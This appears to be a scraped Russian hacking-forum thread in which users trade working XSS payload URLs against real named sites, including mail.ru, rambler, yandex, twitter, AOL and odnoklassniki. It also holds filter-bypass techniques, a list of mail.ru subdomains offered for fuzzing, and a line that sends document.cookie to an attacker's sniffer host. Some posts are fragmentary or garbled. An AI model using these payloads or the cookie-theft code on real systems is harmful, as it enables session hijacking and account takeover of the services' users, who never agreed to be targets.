Twitter - не почтовик, но надеюсь меня не побьют:

http://search.twitter.com/search?q=%26%2339%3B)%3Balert(%26%2339%3Bxek%26%23 39%3B)%3B%2F%2F

И клацаем справа на "Twet the results".

Ну тогда я тоже выложу так как не нашол подходящей темы!
Магазин по продаже софта!

http://soft.qwerty.ru/search/index.php?q=%22%3E%3Cscript%3Ealert%28%27BY+HACKED +Mil-Net%27%29%3C%2Fscript%3E&s=%CD%E0%E9%F2%E8

Почта? Почта!
http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

https://mailserver1.hushmail.com/hushmail/index.php?PHPSESSID=A903042B9212494D8B8F3A7EFA99F9 60

Email Address:
вводим скрипт '><script>alert(/Ruslan1817/)</script>

http://autorambler.ru/journal/testdrives/?brand=%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1&period=day%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

Пассивная xss на mail.ru
https://auth.mail.ru/cgi-bin/auth?page=&post=&login_from=&Login="><SCRIPT>alert("XSS")<%2FSCRIPT>">&Domain=mail.ru&Password=yyy

Пассивная xss на mail.ru
https://auht.mail.ru/cgi-bin/auth?page=&post=&login_from=&Lоgin=">< SCRIPT>alert("XSS")<%2FSCRIPT>">&Domain=mail.ru&Password=yyy

Повтор!

http://forum.antichat.ru/showpost.php?p=1645042&postcount=86

Не почта, но тоже оч забавный ресурс ))

http://naked.com/index.php?s=user.credits.buyCredit&freeRegister=1&freeRegister='%3E%3C''%3E%22%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E

http://11x11.mail.ru/tournaments/414252/act=join&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cooki e)%3C/script%3E

работает тока у авторизированных ... а эт минус.

Работает у авторизированных .

http://11x11.mail.ru/users/10000125/'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cooki e)%3C/script%3E

http://afisha.rambler.ru/message.html?id=33028434&pg=%22%3E%3Cscript%3Ealert%28%27mikail%27%29%3C/script%3E

http://file.qip.ru/preview.jsp?w=200%27&h=200%27&s=no&b=yes&l=javascript:alert(document.cookie);

_http://direct.yandex.ru/registered/main.KJdxxnJWRSRj8t_8.pl?&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Ecmd=newCamp&mediaType=text&notnew=yes

http://maps.icq.com/maps/?country=RU&street=&city=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28d ocument.cookie%29%3C/script%3E

http://finance.rambler.ru/calculators/hypothec/?sum=56&years=6546&interest="><script>alert(/XSS/)</script>

http://do.ngs.ru/categories/services/poligr/sell/?&'><''>"><script>alert('Печенько хочет к маме')</script>

http://rabota.ngs.ru/resumes/search/?pageType=all&'><''>"><script>alert('Печенько хочет к маме')</script>

http://mail.am

http://m.mail.am/mail/util.php?func=info&sort_subject='"><script>alert();</script>


http://mirtesen.ru
http://mirtesen.ru/people/map?city=&igp=#search&<img src=s onerror=alert(document.cookie)>&&

http://www.everyday.com

http://www.register.everyday.com/reg_step.phtml?REG_TEXT_FIRST_NAME="><script>alert('0_o')</script>

http://list.ngs.ru/page.php?do='search&bool=and&substring=0&mh=10&query="><script>alert(document.cookie)</script>

http://en.securitylab.ru/nvd/index.php?'arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%'>"><script>alert(document.cookie)</script>

Может кому будет интересно
http://moscow.megafon.ru/buy/pay/pay/?city=985368&'metro=537480'>"><script>alert(document.cookie)</script>
http://search.twitter.com/search?q=cool+filter%3Alinks'>"><script>alert(document.cookie)</script>

Может кому будет интересно
Очень даже интересно :)
Особенно в таком виде:
http://search.twitter.com/search?q=%66%69%6C%74%65%72%3A%6C%69%6E%6B%73%27%3 E%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65% 6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27http://google.com%27%3C%2F%73%63%72%69%70%74%3E

http://forum2.km.ru/keyboard.aspx?id=</script><script>alert(document.cookie)</script>

http://vkrugudruzei.ru/search/interest.asp?iname=%F2%E0%ED%F6%FB&igroup=&iequal=1>"><script>alert(document.cookie)</script>

liveinternet
<body onload="document.UsrSrchImportFormSrch.submit();">
<form id="UsrSrchImportFormSrch" action="http://www.liveinternet.ru/importmail.php?cmd=getbook_icq" method="post" name="UsrSrchImportFormSrch" onKeyDown="checkKey('UsrSrchImportFormSrch');">
<input class="SrvBorderBlue" type="text" name="addicqs" value='"><script>alert(/Found by life_glider/);</script> <br "' />
<input class="Hi" type="submit" value="Искать!" />
</form>
</body>

http://mbox.i.ua/list/INBOX/?fMask=0&fReq=0&sort=2"><script>alert("FOUND BY LIFE-GLIDER")</script><br%20tr="&p=0&_rand=1274703519

http://job.ukr.net/vacancy/?AdvancedSearch=0&ShowSearchResults=1&event=&sd=-2&Keywords="><img src=foo.png onerror=alert('kusto') />

http://maps.mail.ru

В строке поиска:
' onMouseOver='alert(1)'>
и "Найти"



kards.qip.ru
В любых комментариях в login/pass вставляем
"><img src='.' onerror='alert()'>
И нажимаем "Добавить комментарий"

http://rabota.mail.ru


http://rabota.mail.ru/vac_search/?go=1&city=1'%3Balert(1)%3Ba='

crackmail: не пашет.

пффф, уже пофиксили

money.yandex.ru

https://money.yandex.ru/feedback/?themeTitle=deception&userTheme=1//-->alert(document.cookie)

rambler.ru

Вроде ещё не выкладывали.


http://horoscopes.rambler.ru/names.html?words=">alert('XSS')



http://dating.meta.ua/search.php?action=search&min_age=">alert(/XSS/)



http://index.online.ua/?cx=&q=">alert('XSS')

ukr.net

Не знаю выкладывали или нет, гугл не ответил точно.


http://freemail.ukr.net/q/reg?name=">alert('XSS')



http://kino.ukr.net/subscribe/email%3D%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript %3E

mail.ru

Парочка пассивных xss на форумах mail.ru


http://forum.lady.mail.ru/topic.html?fid=22&tid=28428&sub=6964&old_pg=&old_id=alert("xss")



http://forum.health.mail.ru/topic.html?fid=114&tid=2137&sub=%3Cscript%3Ealert(%22xss%22)%3C/script%3E

Пасcивка на mail.ru


http://starlook.lady.mail.ru/commented?">alert('XSS')

Вот только в alert(document.cookie) точка заменяется на _

Это можно как-нибудь обойти?

Пасcивка на mail.ru

http://starlook.lady.mail.ru/commented?">alert('XSS')

Вот только в alert(document.cookie) точка заменяется на _
Это можно как-нибудь обойти?


так будет лучше.


http://starlook.lady.mail.ru/commented?period=month">alert(document.cookie)

Зря выложил ее, завтра уже будет закрыта.

http://help.aol.com/help/microsites/searchEntry.do?&searchString=">alert(document.cookie)

http://auth.opera.com/service/oauth/authorize?oauth_token=RTMG0hYfEyPQcAltkyZIdmAXHaJy Tf9X">alert(document.cookie)

хотья это не почтовик, но думаю модеры простят меня

http://www.nato.int/cps/en/natolive/search.htm

">alert('ololo')

PR-9

тИЦ- 1100

http://maps.google.com/maps?ll=55.354135,40.297852&spn=42.876902,89.560547&z=4&layer=t&hl=ru

уязвимо поле - Задайте местоположение по умолчанию

поймай меня

снова lady.mail.ru , такой тут еще не было вроде


http://lady.mail.ru/product/?letter=1alert(123)

kids.rambler.ru


http://kids.rambler.ru/faq/271063/tns-counter.ru?p=1alert('~d0s~')

tv.ukr.net


http://tv.ukr.net/?scn=tv&sb=1'>alert(1)

Там почти весь сайт,видимо хсс они за багу не считают

rabota.ngs.ru


http://rabota.ngs.ru/vacancies/search/?other2=yes&rubrics%5B%5D=1">alert(1)

autorambler.ru


http://autorambler.ru/bz/pdd/pddonline/?type=1//-->alert(123)

realty.mail.ru


http://realty.mail.ru/detail/001667605.html

Добавляем в куки имя search_res а значение ставим ">alert(123)

Обновляем страничку,любуемся аллертом

В поле "Электронная почта"

">alert(document.cookie)


http://avito.ru.msn.com/additem



http://avito.ru.msn.com/shops?name="'>alert(document.cookie)

realty.
mail.ru

http://realty.mail.ru/detail/001667605.html

Добавляем в куки имя search_res а значение ставим ">alert(123)
Обновляем страничку,любуемся аллертом




В поле "Электронная почта"
">alert(document.cookie)

http://avito.ru.msn.com/additem



ребят я конечно репу подниму, но скажу что такие уязвимости- бесполезны: цель ксс- атаки- выполнение произвольного кода на стороне клиента жертвы и как-бы просить его подправить куки, либо вписать в поле емайла наш ядовитый код- как-то не по феншую....

P.S. To satana666 - правильное исправление поста, второй ссылкой уже можно добиться результата

cards.rambler.ru


http://cards.rambler.ru/author.html?author=d0s&offset=1">alert('true')

http://szukaj.onet.pl/query.html?qt=777&lr=Polska">alert(document.cookie)

http://wap.ks.korrespondent.net/search.php?keyword=>alert('Speciall y for the Antichat')


ТИЦ 7200 PR 7
Посещаемость очень высокая.

job.gala.net


http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">alert('xz che za')

meta.ua


http://meta.ua/feeds/weather.asp?city=alert(document.cookie)

Вчера там была и в поиске,не успел выложить,сегодня прихожу уже не работает,значит большая вероятность что и эту пофиксят скоро

game.km.ru


http://game.km.ru/magazin/lenta.asp?idRubr=1&order=">alert('d0s')&search=xD

wap.afisha.mail.ru


http://wap.afisha.mail.ru/event.html/">alert(document.cookie)

upd:Кто-то слил им

На днях еще на мейле выложу несколько.

wap.rambler.ru


http://wap.rambler.ru/geo/?back=">alert(123)

wap.afisha.
mail.ru

http://wap.afisha.mail.ru/event.html/">alert(document.cookie)

upd:Кто-то слил им
На днях еще на мейле выложу несколько.


Все баги быстро закрывают из-за того, что сотрудника майла отслеживают такие темы.

teentoday.mail.everyone.net/


http://teentoday.mail.everyone.net/email/scripts/loginuser.pl/">alert(123)

Такого почтовика не слышал,нарыл его в листинге забугорных почтовиков мейла,если что-то не то удалите

XSS рабочая и в рабочем виде, а вот если догадаетесь почему она у вас не заработала или заработала, то вы хэккеры))))


http://market.yandex.ru/model.xml?modelid=4741931&hid=90617#">

http://my-mail.co.il


http://my-mail.co.il/wm/mail/login2.html?user=">alert('XSS')

mail2000.ru


http://mail2000.ru/ya.php?query=">alert(document.cookie)

http://www.virtualjerusalem.com/news.php?Itemid=">alert(/xss/)

smallbusiness.aol.com


http://smallbusiness.aol.com/search/?q=alert(document.cookie)

lycos.com


https://registration.lycos.com/forgot.php/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

mail.infobox.ru


http://mail.infobox.ru/redirect.php?login_username=">alert(/xss/)&secretkey=">alert(/xss/)&js_autodetect_results=1&just_logged_in=1&lng=ru_RU&lng=ru_RU

music.aol.com


http://music.aol.com/pictures/search/?cat=photo&query=alert(document.cookie)

xakep.ru


http://xakep.ru/local/search/result.asp?tosearch=alert(document.cookie)

aboutmail.ru

http://www.aboutmail.ru/?option=com_performs&formid=1

уязвимые поля:

Ваше имя: *

Ваш EMail: *

Заголовок: *

//добавь пример.

не почтовый сервис, но XSS няшка

[QUOTE="None"]
http://www.vaytube.com/search?search_query='">

Mail.am: PR - 4



http://realty.mail.am/index.php?page=view_2&tp_tp=\%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E&return=0&realty

Mail.ru

Mail.ru​


http://zhuki.mail.ru/?register=2&form[nick]=%27onmouseover=%27alert%28/xss/%29;%27%20name=%272



после перехода на ссылку, наведите мышуку на радиокнопку

http://www.hackzone.ru/memb/?a=list&sort=2">alert(document.cookie)

http://deti.mail.ru/search/?key_find=%22%3E%27%2B%2F-%2F%2Balert%28777%29%2F%2F%3E

http://minigames.mail.ru/user/login_form

Yязвимые поля:

Uмя: ">alert('xss');

http://i-email.ru/signup/

Уязвимы поля "Имя", "Фамилия", "Телефон"

">alert(/XSS/)

http://e-mail.ua/login/

Уязвимо поле "Логин"

">alert(/XSS/)

http://autos.aol.com/cars-Buick-Enclave-2012-foo__bla-xss-6619">alert%2528document.cookie%2529/best-deal/

http://minigames.mail.ru/#game&ident=durak

Уязвимо поле "Имя"

">alert(/XSS/)

http://horoscopes.rambler.ru/psychology.html?id=1174592&sec=1174580">alert('XSS')

Крупнейший русскоязычный битторрент трекер.


http://pm.rutracker.org/forum/privmsg.php?mode=post">alert(document.cookie)

Рамблер.


http://horoscopes.rambler.ru/names.html?rubric=0&words=test">alert('xss')



http://help.rambler.ru/1/search/avia/?set=help&query=111">alert('xss')



http://planeta.rambler.ru/abuse.html?url=">alert('xss')

Google XSS!




Кибер, сессию и куки спереть реально.


Было бы интересно почитать, как это сделать. JS выполняется даже не на поддомене, а на googleusercontent.com. Кроме опен-редиректа и фишинга юзеров гугла не могу придумать варианты использования этого бага.

Tumblr - сервис микроблоггинга​тИЦ 3600 PR 8


https://www.tumblr.com/register/join_tumblr?referring_blog=usagov%22%3E%3Cscript%3 Ealert()%3C/script%3E

P.S. Достаточно известный сервис, можно юзнуть

--

USA Government​

тИЦ 350 PR 10


http://search.usa.gov/search/news?affiliate=usa.govblog&locale=en&m=false&query=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&tbs=h

P.S. Тут есть ПП, поэтому может кому понадобится.

Ещё один msn.com


http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992"/>

Ещё один msn.com

http://ringtones.nl.
msn.com
/games.php?rtch=1&rtlo=41992
"/>


Это не обычная пассивка, а DOM-based, поэтому защита от XSS в браузерах на нее не сработает.

Со страницы вызывается скрипт http://www.ringtonio.nl/javagames/?..., уязвимый к XSS в реферере.

Данные из реферера выводятся в двух местах:


d.writeln('window.open (bd+"/send/javagame?id="+nr+"&clx=1&rths=0&brpc=&rtlo=
41992\"/>
","sendpop","toolbar=no,location=no,directories=no,status=yes,m enubar=no,scrollbars=yes,resizable=no,copyhistory= no,width=600,height=450,screenX=0,screenY=0,top=0, left=0");');




d.writeln('[/COLOR][/B]
">');


Видно, что кавычки экранируются. Но это происходит внутри строки в функции вывода, поэтому на странице экранирования не будет.

В примере используется второй вариант вывода - внутри тега input. Но зачем лишние символы?

http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992">[/COLOR]

Без них все работает нормально:

[B]http://ringtones.nl.msn.com/games.php?rtlo=">

liveinternet.ru


http://www.liveinternet.ru/tests.php?cmd=show&session_id=7f00c824a22d703516ea5e7e94fc4a1b&order=%22%3E%3Cscript%3Ealert%28document.cookie%29 %3C/script%3E



http://www.liveinternet.ru/search/?q=">alert(document.cookie)

[CODE]
http://muziek.downloaden.nl.msn.com/artist.php?artist=2pac">alert(document.cookie)

P.S. Xss с mandriva пашет только в Opera+IE.


Продолжаем знакомство с XSS.

Тема урока - "почему в одном браузере работает, а в другом нет"

http://store.mandriva.com/simple_popup_image.php?img='>alert()alert(1)= 8 тоже).

[B]"alert()" вырезается фильтром и XSS не срабатывает. Чтобы это увидеть, можно в окне браузера нажать правую кнопку мыши и выбрать "Inspect element"

На странице код внедряется внутри тега img.





У этого тега есть события onload и onerror, поэтому нет смысла его закрывать и использовать тег script. Достаточно вставить такой код:





http://store.mandriva.com/simple_popup_image.php?img=[COLOR="Green"]'+onerror=alert(1)+

Этот вариант работает в IE (до 8 версии), опере, фф, но все так же не работает в хроме. Фильтр вырезает "=alert(1)".

Попробуем сделать так:

http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/

Код "alert(1);/" содержит ошибку синтаксиса JS и не будет выполняться браузером, поэтому фильтровать его (казалось бы) необязательно. Но посмотрим внимательнее на ответ сервера:





Так как после onerror= нет открывающей кавычки, весь код до закрытия тега будет считаться значением onerror. Браузер этот код видит так:





"alert(1);/'/" уже не содержит ошибок синтаксиса и выполняется хромом в обход фильтра.

Окончательный вариант:

http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/

Не работает в IE >= 8

http://techguru.aol.com/?ncid=txtlnkusstor00000094">alert(String.fromCharCode(88,83,83,32,65,78,84,73, 67,72,65,84))

LiveInternet


http://www.liveinternet.ru/jsearch/?s=">alert('xss')

Lycos Mail (http://www.mail.lycos.com/)​тИЦ 100

PR 7


http://games.lycos.com/board-game/gacopyrze-vs_-wilkolkialert(document.cookie)/

Mail.ru


http://apps.hi-tech.mail.ru/contest/add/?comment=&Domain=mail.ru&Login=&Password=&platform=">alert('xss')

kravch_v, не надо юзать HTML, если XSS внутри JS-кода.

http://apps.hi-tech.mail.ru/contest/add/?platform='%3Balert('xss')%3Ba='

M_script, спасибо!

Google XSS


http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://ссылка_на_уязвимый_код

Пример:


http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://exploit-db.ru/googlexss/

Для кражи кук используйте следующий код:


img = new Image(); img.src = "http://адрес_сниффера.gif?"+document.cookie;

// M_script, то сообщение кто-то удалил. Печеньки я каким-то образом крал. Пассивки на ютубе нету.

kravch_v, ты в начале января уже выкладывал эту XSSку на гугле. Там выполнение JS-кода происходит не на google.ru(com), а на googleusercontent.com. Соответственно, куки будут с домена googleusercontent.com. Как их можно использовать на практике?

upd:


Печеньки я каким-то образом крал


Куки на googleusercontent.com есть и украсть их можно, но в них не содержится сессии google.com

Mail.Ru - Недостаточная фильтрация в cookie

Уязвимый код (cookie):


Mpop=test:test:test@test.ru">alert('xss');

Заходим на w2.dwar.mail.ru и код успешно выполняется.

Почта Укр.нет (http://kino.ukr.net)

[HTML]
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+">+

[/QUOTE]
" if author else f"




По сути можно поставить onerror и onload, нужно только подумать как .

[QUOTE="Unix@"]
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+">++

[CODE]
http://kino.ukr.net/persons/search?query=">alert('xss')

Также есть активная XSS на самой странице видео.

Уязвимое место "теги"

LiveInternet.Ru


POST Запрос


http://liveinternet.ru/importmail.php?cmd=getbook_icq&addicqs=111">alert(/xss/)





http://liveinternet.ru/flashes.php?id=58259&page=0&filter=">alert('xss')





http://liveinternet.ru/flashes.php?id=629&page=1&userid=&cardinfo=">alert('xss')





http://litube.li.ru/yandex/?search_string=111">alert('xss')

Ya.ru

Уязвимый код:




1) Заходим на clubs.ya.ru

2) Жмякаем на "Записать мысль"

3) Пишем в "HTML-Режиме" уязвимый код и переходим в режим "с оформлением"

XSS Выполняется.

3) Пишем в "HTML-Режиме" уязвимый код и переходим в режим "с оформлением"
XSS Выполняется.


Это не пассивка, а DOM-based

Это не пассивка, а DOM-based


Но тем не менее.

Еще видел одну маленькую дырочку, но раскрутить так и не смог. (Фильтруются , и еще несколько HTML-Тегов).

,
- выводятся.

http://pulse.mts.ru/search?q=">alert(document.cookie)

На мaил есть рабочая хcс?

Мoгу пoменяться на oбхoд 704 oшибки

Xss на mail.ru

Работает не во всех платформах OC на Windows 7 не пашет.


http://search.enc.mail.ru/search_enc?q=">

Xss на mail.ru
Работает не во всех платформах OC на Windows 7 не пашет.


на xp тоже не пашет

xss mail.ru

Не знаю почему у меня работает,честно.

http://imglink.ru/thumbnails/26-02-12/a51e51e4e431297ef90aa24de037d742.jpg (http://imglink.ru/show-image.php?id=37d38dfc564a1bd3aff42782f68d1f73)

Не знаю почему у меня работает,честно.
http://imglink.ru/thumbnails/26-02-12/a51e51e4e431297ef90aa24de037d742.jpg (http://imglink.ru/show-image.php?id=37d38dfc564a1bd3aff42782f68d1f73)


Браузер обнови) попробуй.

Список 403 доменов на мейл.ру

если у кого есть желание могут поФаззить на скрипты

там дырявые есть 100%, парочку пасивок на прошлой неделе снял


http://aj.mail.ru
http://bs.mail.ru
http://dn.mail.ru
http://ff.mail.ru
http://fx.mail.ru
http://js.mail.ru
http://kp.mail.ru
http://ok.mail.ru
http://r1.mail.ru
http://r2.mail.ru
http://r3.mail.ru

Xss на Mail.ru

1. Заходим на страницу http://webagent.mail.ru/r/webagent/popup.html?branch=redesign-rc6.

2. Добавить Контакт

3.


"


4.Вставляем этот код в любое место

5.Нажимаем найти

Unix@, как эту XSS можно использовать на практике?

@bigmir.net

Тип уязвимости: Активная XSS

Находится в сервисе "Дневники".

Где найти?

Мой дневник => Заметки => Добавить заметку​Уязвимое поле:

Теги​Пример:

alert('xss')​

XSS на Mail.ru

Работает только у авторизованных.


http://moto.mail.ru/login.html?Page=javascript:alert('xss');


Нажать кнопкуПродолжить

http://vashdom.tut.by/search/?search=alert('xss')

TUT.by

Пассивка TUT.by


http://slovari.tut.by/index.php?skeyword=">alert(0)">alert(0)

icq.com

validate.icq.com/icq/validate.html?uid=1&sid=23">alert('XSS')&lang=en

adobe.com

store1.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type=">&code=adobe&cat=classification

Пассивка на ачате))

PR 5 | GI - 4 980 000 | CY 240 | 243 000

Античат конечно не почтовый сервис, но я думаю меня простят)))

http://video.antichat.ru/video/Номер видео/

Post запрос


author=">[XSS] или &comment=">[XSS]


Там еще защита от CSRF стоит, так что для приведения в действие надо использовать технику считывания токена, (ссылка (https://antichat.live/showthread.php/p/2665544/) )

Там еще защита от CSRF стоит, так что для приведения в действие надо использовать технику считывания токена, (
ссылка (https://antichat.live/showthread.php/p/2665544/)
)


Данные с сайта можно считать только при наличии XSS. Здесь нет токена, значит нет XSS, значит нет токена, значит нет XSS... В общем, это фейл

Данные с сайта можно считать только при наличии XSS. Здесь нет токена, значит нет XSS, значит нет токена, значит нет XSS... В общем, это фейл




function ajaxComment(){ //Эта херня отправляет коммент, только надо в параметрах баттона указать return false;


Действительно, херня какая-то ))))

Оказывается при выполнении функции отправки комментария и происходит инжект, в код который занимается собственно отправкой:


function ajaxComment(){ //Эта херня отправляет коммент, только надо в параметрах баттона указать return false;
var author = document.getElementsByName('author')[1].value;
var message = document.getElementsByName('comment')[0].value;
var csrf = document.getElementsByName('csrfmiddlewaretoken')[0].value;
$.ajax({
type: "POST",
url: document.location.href,
data: "csrfmiddlewaretoken="+csrf+"&author="+author+"&comment="+message,
success: function() {
$('#comment').hide().append(''+author+' написал'+message+'').show('slow');
}
});
return false;

}

И хотя данные после отправки на php чистятся, сама возможность инъекции присутствует, но ее нельзя удаленно эксплуатировать, потому что страница защищена опять такие тем самым токеном, если бы была возможность провести csrf, эту атаку можно было бы реализовать удаленно, делая инжект через пост запрос (http://hacker-pro.net/thread/22765/p1.html)

А моя статья оказывается тут нифига не поможет, потому что она нужна когда есть удаленный xss и требуется csrf, а у нас нет удаленного xss ))

Вывод: Java Script инъекция есть


Но человек должен вставить свой код и нажать кнопку отправки. Есть идеи насчет практической реализации атаки?


если бы была возможность провести csrf, эту атаку можно было бы реализовать удаленно, делая инжект через пост запрос


Нет. Это DOM-based XSS, код внедряется напрямую через JS, а не возвращается в ответе на POST-запрос.

Нет. Это DOM-based XSS, код внедряется напрямую через JS, а не возвращается в ответе на POST-запрос.


Я тоже самое сказал)) Имелось ввиду что можно было бы кликабельную пассивку получить..

Насчет практики, нет, не юзабельно (удаленно)

Хотя, теоретически))

Можно:

1.отправить человека на свой php скрипт

2.скрипт выводит iframe с античатом

3.js код введет наш инъект в поле в iframe, и 'нажмет' на кнопку отправить коммент

4.инжект выполнится))

Ну в общем это из раздела фантастики))))

2.скрипт выводит iframe с античатом
3.js код введет наш инъект в поле в iframe, и 'нажмет' на кнопку отправить коммент


Не получится. http://ru.wikipedia.org/wiki/Правило_ограничения_домена

km.ru​

После ошибки авторизации на главной странице, вы будете перенаправлены на http://n.mail.km.ru/extra/form. Не фильтруется поле "Пароль".

Post:​


user_login=support-mail&user_domain=freemail.ru&user_password=%22%3E%3Cscript%3Ealert%28%27Hello%2 C+world%27%29%3B%3C%2Fscript%3E&op=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&form_build_id=form-a080de13ffb21494853525a2e1c6cf72&form_id=_imap_mail_extra_login_form

Утверждение верно для всех доменов, кроме km.ru (@freemail.ru, @bossmail.ru etc.)

Активная xss в теле письма на 59.ru

Активная xss в теле письма на http://59.ru/

Почта (http://59.ru/mail)

Xss код




Далее я сделал бонус,автоудаление письма

Код автоудаление письма




Я бы этот код запихал в JS фаил и вызвал через xss.

Но есть но,нужно сделать очистку корзины,поэтому надо делать через Js фаил.

PS создайте тему с активными xss в теле письма пжл.

Активная xss на foto.meta.ua

Активка тут http://foto.meta.ua/4552903.image

Уязвимый код тэги

" onmouseover='alert(document.cookie)'

Выполняется принаведении на тэги.

job.gala.net

http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">alert('xz che za')

http://avia.rambler.ru/anytime?max_days=%3Cimg%20src=x:%20onerror=alert(d ocument.cookie)%3E

http://avia.rambler.ru/anytime?min_days=%3Cimg%20src=x:%20onerror=alert(d ocument.cookie)%3E

Пассивная XSS odnoklassniki.ru

https://cards2.odnoklassniki.ru/index.html?ServiceDescr=XSS

Пассивная XSS odnoklassniki.ru

http://api.odnoklassniki.ru/fb.do?method=users.getInfo&js_callback=

Пассивная XSS в mail.ru

Пассивная XSS в mail.ru работает в опере


http://gameshop.mail.ru/order/?back=%22%3E%3Cscript%3Ealert%28%29%3C/script%3E

//Может ещё выложу

http://rs.mail.ru/b23468426.swf?link1=%6A%61%76%61%73%63%72%69%70%74 %3A%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%6 3%6F%6F%6B%69%65%29

Клик на банер

Это активная вроде? Но может надо кому

http://richmedia.aol.com/demopopup.php?id=9132&demo_link=/ width=1400 height=900 >alert(document.cookie)

http://vwo.osm.rambler.ru/index.php?page=wotall%3C/h1%3E%3Cbr%3E%3Cscript%3Ealert('w0rm.pw')%3C/script%3E

http://errors.aol.com/login/?alert(/XSS/)